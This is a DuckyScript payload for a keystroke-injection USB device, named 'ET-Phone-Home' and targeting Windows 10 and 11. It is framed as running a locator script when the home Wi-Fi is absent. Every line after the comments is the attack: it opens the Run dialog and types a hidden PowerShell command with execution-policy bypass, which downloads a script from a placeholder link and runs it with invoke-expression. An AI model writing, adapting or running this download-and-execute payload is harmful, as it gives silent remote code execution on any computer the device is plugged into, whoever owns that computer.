REM         Title: ET-Phone-Home

REM         Author: I am Jakoby

REM         Target: Windows 10, 11

REM         Description: this script will download and execute your locator script if your wifi access point is not detected
            REM this script needs to be saved in the boot directory to have it run as soon as your device is plugged in
            
REM         Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
REM         Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly           

REM         Replace SSID with name of wifi your computer is connected to

IF_NOT_PRESENT SSID="Home"

GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER


